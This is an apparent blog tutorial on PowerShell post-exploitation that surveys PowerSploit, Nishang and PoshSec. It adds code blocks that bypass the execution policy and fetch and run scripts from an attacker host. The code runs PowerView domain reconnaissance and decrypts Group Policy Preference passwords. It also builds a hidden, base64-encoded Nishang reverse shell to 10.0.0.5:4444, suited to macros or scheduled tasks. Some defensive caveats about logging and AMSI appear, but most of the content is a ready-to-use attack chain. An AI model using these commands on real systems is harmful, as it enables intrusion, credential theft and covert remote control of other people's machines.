Post Exploitation with PowerShell
Lateral movement is tricky when you do not want to trigger any alerts on the sysadmin's screen, so what could be better than being cheeky and hiding in plain sight? Since Windows 7, PowerShell has shipped pre-installed on Microsoft's operating systems, and it is meant to assist sysadmins in their daily tasks. Many of its default aliases (ls, cat, cd, ps) mirror a Unix shell such as bash, so it feels familiar, although its pipeline passes .NET objects rather than text. You can do pretty much everything with it on a Windows system, from adding group policies on a domain controller to dumping system information to changing passwords.
Normally the execution policy (Restricted by default on client editions of Windows) stops you from running .ps1 script files, which is why people assume they need a shell with administrative rights first. The execution policy is not a security boundary, though: it is a per-session safety setting, and there are a lot of ways to circumvent it as an ordinary user.
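The usual ways of getting past the execution policy without administrative rights, as an added example (not part of the original post). It assumes a script to run at C:\temp\recon.ps1, which is a placeholder.

```powershell
# Added example, not code from the original post. Assumes a script at
# C:\temp\recon.ps1 (placeholder). None of these steps needs admin rights.

# 0. See which policy wins for this session (MachinePolicy > UserPolicy >
#    Process > CurrentUser > LocalMachine). If a GPO sets MachinePolicy,
#    only the in-process tricks (3 to 5) below still work.
Get-ExecutionPolicy -List

# 1. Start a child powershell.exe with the policy bypassed for that process only.
powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\temp\recon.ps1

# 2. Change the policy for the current process scope. Nothing is written to
#    the registry, so it disappears when the process exits.
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass -Force
& C:\temp\recon.ps1

# 3. Never run the file as a script: read its text and pipe it to Invoke-Expression.
#    The policy only governs script files, not script text already in memory.
Get-Content C:\temp\recon.ps1 -Raw | Invoke-Expression

# 4. Download-and-execute from a remote host, the pattern most tool loaders use.
IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/recon.ps1')

# 5. Hand the commands over as a base64 string. PowerShell expects the bytes
#    of a UTF-16LE (Unicode) string, not UTF-8.
$script = Get-Content C:\temp\recon.ps1 -Raw
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($script))
powershell.exe -NoProfile -EncodedCommand $encoded
```

Caveat for the "hide in plain sight" goal: bypassing the execution policy does not hide the script. With Script Block Logging enabled, the decoded text of whatever runs (including the contents of an -EncodedCommand) is written to the Microsoft-Windows-PowerShell/Operational log as event ID 4104, and on Windows 10 and Server 2016 and later AMSI inspects it before execution. Constrained Language Mode and AppLocker are the real controls, and they are not affected by any of the steps above.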
The most popular tool for post exploitation with PowerShell is indisputably PowerSploit (as of 10/01/2019), and it should be the first stop when launching post-exploitation scripts.
PowerSploit Github: https://github.com/PowerShellMafia/PowerSploit
PowerSploit is organized into ten modules:
- CodeExecution – Perform low-level code execution and code injection.
- ScriptModification – Modify and/or prepare scripts for execution on a compromised machine.
- Persistence – Add persistence capabilities to a PowerShell script.
- PETools – Parse/manipulate Windows portable executables.
- Capstone – A PowerShell binding for the Capstone Engine disassembly framework.
- ReverseEngineering – A wide range of reverse engineering tools.
- AntivirusBypass – Defeat AV byte signatures in executables.
- Exfiltration – Steal sensitive data from a compromised machine.
- Mayhem – Perform destructive actions.
- Recon – Tools to aid in the reconnaissance phase of a penetration test.
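Loading PowerSploit and using its Recon and Exfiltration modules on a domain-joined host, as an added example (not code from the original post or from the PowerSploit project). It assumes a checkout of the repository in C:\tools\PowerSploit and an attacker web server at 10.0.0.5, both placeholders; the function names are those of PowerView (Recon) and Get-GPPPassword (Exfiltration) as shipped in PowerSploit's dev branch.

```powershell
# Added example, not from the original post or the PowerSploit project.
# Assumes: repository copy in C:\tools\PowerSploit, attacker web server at
# 10.0.0.5 (placeholders), and a session running as a domain user.

# Option A: import the whole framework from disk via its root manifest.
# Simple, but the .ps1 files on disk are what antivirus signatures match.
Import-Module C:\tools\PowerSploit\PowerSploit.psd1 -Force

# Option B: load a single module straight into memory. Nothing touches disk,
# but the script text is still seen by script block logging (event ID 4104)
# and by AMSI, so this is "fileless", not "invisible".
IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/Recon/PowerView.ps1')

# Recon (PowerView): where does the current user sit in the domain?
Get-DomainUser -Identity $env:USERNAME | Select-Object samaccountname, memberof

# Recon: accounts with a service principal name are Kerberoast candidates;
# accounts without Kerberos pre-authentication are AS-REP roast candidates.
Get-DomainUser -SPN | Select-Object samaccountname, serviceprincipalname
Get-DomainUser -PreauthNotRequired | Select-Object samaccountname

# Recon: machines where the current user already has local admin. Useful for
# picking the next hop, but noisy: it opens an SMB session to every host.
Find-LocalAdminAccess

# Exfiltration: Group Policy Preference cpassword values stored in SYSVOL.
# Microsoft published the AES key, so any domain user can decrypt them.
Get-GPPPassword
```

Run the quiet LDAP queries (Get-DomainUser) first and leave Find-LocalAdminAccess for last: LDAP reads from a domain-joined host look like any other client, while a burst of SMB logons to hundreds of machines from one workstation is exactly what a lateral-movement detection is tuned for.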
The second big collection is Nishang (https://github.com/samratashok/nishang), whose scripts are grouped into thirteen categories:
1. Antak-Webshell – A web shell written in ASP.NET
2. Backdoors – Various backdoors
3. Client – Crafted files and documents to send to a victim
4. Escalation – Privilege escalation
5. Execution – Execute commands
6. Gather – Information gathering on a target
7. Misc – Miscellaneous scripts
8. Pivot – Pivoting to other hosts
9. Prasadhak – Check the hashes of running processes against VirusTotal
10. Scan – Brute force and port scan
11. Shells – Invoke various shells
12. Utility – Various helper scripts, including ones that help cover your tracks
13. Powerpreter – Assists in the deployment of shells, files, etc.
Nishang is a bit more offensive in that its scripts also assist with the actual exploitation of a system, for example through drive-by downloads delivered with the Client scripts and the connect-back shells in Shells. Both PowerSploit and Nishang are actively maintained and constantly extended with new functionality.
A little older but worth mentioning is PoshSec. It is meant as a graphical front end for working with PowerShell from a security perspective.
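A reverse shell with Nishang's Invoke-PowerShellTcp, first interactively and then packed into the kind of one-liner a drive-by document or a scheduled task would carry, as an added example (not code from the original post or from the Nishang project). It assumes an attacker host at 10.0.0.5 (placeholder) that serves Shells/Invoke-PowerShellTcp.ps1 over HTTP and listens with netcat on port 4444; Invoke-PowerShellTcp and its -Reverse, -IPAddress and -Port parameters are Nishang's own.

```powershell
# Added example, not from the original post or the Nishang project.
# Assumes: attacker at 10.0.0.5 (placeholder) serving Invoke-PowerShellTcp.ps1
# over HTTP and running `nc -lvnp 4444` before the target connects back.

# --- On the target, interactively ---
# Load the shell function into memory (no file on disk) and connect back.
# The attacker's netcat then gets an interactive PowerShell prompt.
IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/Invoke-PowerShellTcp.ps1')
Invoke-PowerShellTcp -Reverse -IPAddress 10.0.0.5 -Port 4444

# --- Same thing as a single encoded command line ---
# This is the form that fits into an Office macro, a Run key, a scheduled
# task or a WMI event subscription. -EncodedCommand takes base64 of the
# UTF-16LE bytes, and -WindowStyle Hidden keeps the console off the screen.
$payload = @'
IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/Invoke-PowerShellTcp.ps1')
Invoke-PowerShellTcp -Reverse -IPAddress 10.0.0.5 -Port 4444
'@
$encoded = [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($payload))
$oneLiner = "powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand $encoded"
$oneLiner
```

Two things a defender will see even though nothing is written to disk: the outbound TCP connection from powershell.exe to a port that is not 80 or 443, and, with Script Block Logging on, the decoded payload in event ID 4104. Nishang's Shells folder also has UDP, ICMP and HTTPS variants of the same shell for networks where plain TCP egress on an odd port is blocked.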